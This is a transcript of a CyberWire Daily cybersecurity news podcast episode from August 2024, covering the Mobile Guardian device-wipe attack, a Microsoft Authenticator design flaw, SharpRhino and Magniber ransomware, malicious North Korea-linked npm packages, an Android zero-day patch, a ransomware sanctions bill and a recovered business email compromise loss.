The CyberWire Daily Podcast 8.6.24
Ep 2123 | 8.6.24

Cyberattack calls for an early dismissal.

Transcript

Thousands of education sector devices have been maliciously wiped after an attack on a UK MDM firm. A perceived design flaw in Microsoft Authenticator leaves users locked out of accounts. SharpRino charges ahead to deploy ransomware. North Korea’s Stressed Pungsan provides initial access points for malware distribution. Magniber ransomware targets home users and SMBs. Google patches an Android zero-day. A new Senate bill aims to treat ransomware as terrorism. Microsoft ties security to employee compensation. Guest Kim Kischel, Director of Cybersecurity Product Marketing at Microsoft, discusses how AI is impacting the unified security operations center. A victim of business email compromise gets some good news.

Today is Tuesday August 6th, 2024. I’m Dave Bittner. And this is your CyberWire Intel Briefing.

Thousands of education sector devices have been maliciously wiped after an attack on a UK MDM firm. 

A massive cyberattack on Mobile Guardian, a UK-based mobile device management (MDM) firm, has disrupted schools and businesses globally, affecting North America, Europe, and Singapore. Thousands of iOS and ChromeOS devices were remotely wiped, causing data loss. The company is investigating and has temporarily halted services.

The attack severely impacted Singapore’s education sector, with about 13,000 students from 26 secondary schools unable to access applications on their iPads and Chromebooks. Singapore’s Ministry of Education (MOE) removed the Mobile Guardian app as a precaution and is working to restore device functionality.

The attack underscores vulnerabilities in educational systems and the need for stronger cybersecurity measures, including multi-factor authentication and regular security audits, to protect critical infrastructure from sophisticated cyber threats.

A perceived design flaw in Microsoft Authenticator leaves users locked out of accounts. 

As multi-factor authentication (MFA) becomes more prevalent, users increasingly rely on apps like Microsoft Authenticator to secure their accounts. CSO Online highlights what they describe as a significant design flaw that causes users to be locked out of their accounts. The problem arises when users add a new account via QR code scan—a common setup method—leading to Microsoft Authenticator overwriting accounts that share the same username. This occurs because the app fails to append the issuer’s name to the username, unlike other authentication apps such as Google Authenticator.

This oversight means that users frequently encounter issues when accessing their accounts, often blaming the company issuing the authentication rather than recognizing the flaw within Microsoft Authenticator. This misunderstanding results in wasted helpdesk resources as companies attempt to resolve an issue beyond their control.

Experts have noted that this issue has persisted since the app’s release in 2016. Despite the availability of workarounds, such as using alternative authentication apps or manually entering codes, the problem highlights a significant gap in Microsoft’s design approach. Critics argue that Microsoft’s decision not to align with industry standards, which would prevent such overwriting issues, reflects a lack of consideration for user experience.

This situation underscores the importance of designing software with both security and usability in mind. 

SharpRino charges ahead to deploy ransomware. 

Ransomware-as-a-Service (RaaS) group Hunters International has developed SharpRhino, a new C# malware used as an initial infection vector and persistent Remote Access Trojan (RAT). Delivered via a typosquatting domain mimicking Angry IP Scanner, SharpRhino increases privileges and moves laterally to deploy ransomware. Hunters International emerged in October 2023 and ranks among the top ten ransomware actors. Strongly linked to the defunct Hive group, it uses a Rust-based encryptor to lock files with the .locked extension after exfiltration.

SharpRhino disguises itself as a legitimate network tool using a valid code certificate. It communicates with a Cloudflare Serverless Architecture endpoint, the command-and-control infrastructure, using obfuscated C# code and fileless malware tactics. 

North Korea’s Stressed Pungsan provides initial access points for malware distribution. 

GuardDog software identified two malicious packages in PyPi and npm, linked to a North Korean-aligned threat actor cluster known as “Stressed Pungsan,” aligning with Microsoft’s MOONSTONE SLEET. These packages serve as initial access points for malware distribution, facilitating data exfiltration, credential theft, and lateral movement within targeted environments.

On July 7th, 2024, an npm user named nagasiren978 uploaded “harthat-hash” and “harthat-api,” which downloaded malware from a North Korean command-and-control server, using malicious batch scripts and DLLs to target Windows systems. These packages employed a pre-install script to download and execute a DLL using the “rundll32” utility and then self-destruct to avoid detection.

Analysis revealed these packages impersonated legitimate ones by mimicking their names. The downloaded DLL appeared benign, suggesting it might be an incomplete version or part of testing, indicating possible experimentation by the threat actors.

Magniber ransomware targets home users and SMBs. 

The Magniber ransomware campaign is aggressively targeting home users worldwide, encrypting devices and demanding ransoms starting at $1,000. Magniber, which began in 2017 as a successor to the Cerber [sir-burr] ransomware, has used various methods over the years, including exploiting Windows zero-days, fake updates, and trojanized software cracks. This ransomware mainly targets individual users and small businesses who unwittingly download and execute malicious software.

Recent spikes in Magniber activity have been noted since July 20, 2024, with victims reporting infections after using software cracks or key generators. Once activated, Magniber encrypts files and leaves a ransom note with a URL to a Tor site for payment. Currently, there is no free decryptor for Magniber’s latest versions. Users are advised against using illegal software cracks, as they pose significant security risks.

Google patches an Android zero-day. 

Google announced its August 2024 security patches for Android, addressing over 40 vulnerabilities, including a zero-day flaw, CVE-2024-36971. This high-severity kernel vulnerability, potentially exploited in targeted attacks, can lead to remote code execution with system privileges. Discovered by Google’s Clément Lecigne, it involves a use-after-free condition. Other patched vulnerabilities affect the framework, system, Arm, Imagination Technologies, MediaTek, and Qualcomm components, including one critical Qualcomm flaw allowing a permanent denial-of-service condition. These updates aim to enhance Android’s security against privilege escalation, information disclosure, and DoS attacks.

A new Senate bill aims to treat ransomware as terrorism. 

A new proposal from The Senate Intelligence Committee aims to combat ransomware by treating it like terrorism. Sponsored by Mark Warner (D-VA), the bill seeks to name and shame ransomware gangs as “hostile foreign cyber actors” and designate countries that harbor them as “state sponsors of ransomware,” allowing sanctions similar to those for terrorism. This would be the first U.S. law directly linking ransomware to terrorism.

The bill is intended to elevate ransomware to a national intelligence priority, empowering U.S. agencies to act more aggressively against threats. However, experts question its effectiveness, noting that ransomware groups and their state sponsors are often already under sanctions and questioning if new ones would have any real impact. Critics argue the bill might be more symbolic than practical, signaling Washington’s commitment to addressing ransomware attacks.

Microsoft ties security to employee compensation. 

To address recent criticism for security issues in its products, Microsoft is now linking security performance to employee reviews and compensation.

An internal memo from Microsoft’s chief people officer, Kathleen Hogan, outlines a new “Security Core Priority” policy, emphasizing security over other considerations. Lack of focus on security may impact promotions, salary increases, and bonuses. Employees are expected to integrate security into their work and demonstrate improvements in performance reviews, tracked through the company’s “Connect” tool.

This initiative extends to all roles, with executives having security deliverables tied to their reviews. The policy aims to solidify Microsoft’s security-first mindset across its workforce, crucial for maintaining trust in its software and services globally.

 

Next, I speak with Kim Kischel. She’s Director of Cybersecurity Product Marketing at Microsoft. We talk about how AI is impacting the unified security operations center and how it's changing the way defenders defend.We’ll be right back.

Welcome back

A victim of business email compromise gets some good news. 

And finally, It’s nice to be able to share good news from time to time. A Singaporean commodity firm narrowly escaped a significant loss when police intervened to recover nearly all of the $42.3 million taken in a business email compromise (BEC) scam. Interpol reported that the firm mistakenly transferred the funds to a bank account on July 15 after receiving a fraudulent email that appeared to be from a legitimate supplier. The scam was discovered four days later when the actual supplier reported non-payment.

The Singapore Police Force utilized Interpol’s Global Rapid Intervention of Payments (I-GRIP) to track and withhold $39 million from the scammers’ account. Authorities arrested seven individuals and recovered an additional $2 million. Interpol praised the swift cooperation between local law enforcement agencies in recovering the funds and identifying the perpetrators. BEC scams netted over $2.9 billion in 2023, underscoring the importance of such international collaboration.

And that’s the CyberWire.

For links to all of today’s stories, check out our Daily Briefing at the cyberwire dot com.

We’d love to know what you think of this podcast. Your feedback ensures we deliver the insights that keep you a step ahead in the rapidly changing world of cybersecurity. If you like the show, please share a rating and review in your podcast app. Please also fill out the survey in the show notes or send an email to cyberwire@n2k.com

We’re privileged that N2K CyberWire is part of the daily routine of the most influential leaders and operators in the public and private sector, from the Fortune 500 to many of the world’s preeminent intelligence and law enforcement agencies.

N2K makes it easy for companies to optimize your biggest investment, your people. We make you smarter about your teams, while making your teams smarter. Learn how at n2k.com.

 

This episode was produced by Liz Stokes. Our mixer is Tré Hester, with original music and sound design by Elliott Peltzman. Our executive producer is Jennifer Eiben. Our executive editor is Brandon Karpf. Simone Petrella is our president. Peter Kilpe is our publisher, and I’m Dave Bittner. Thanks for listening.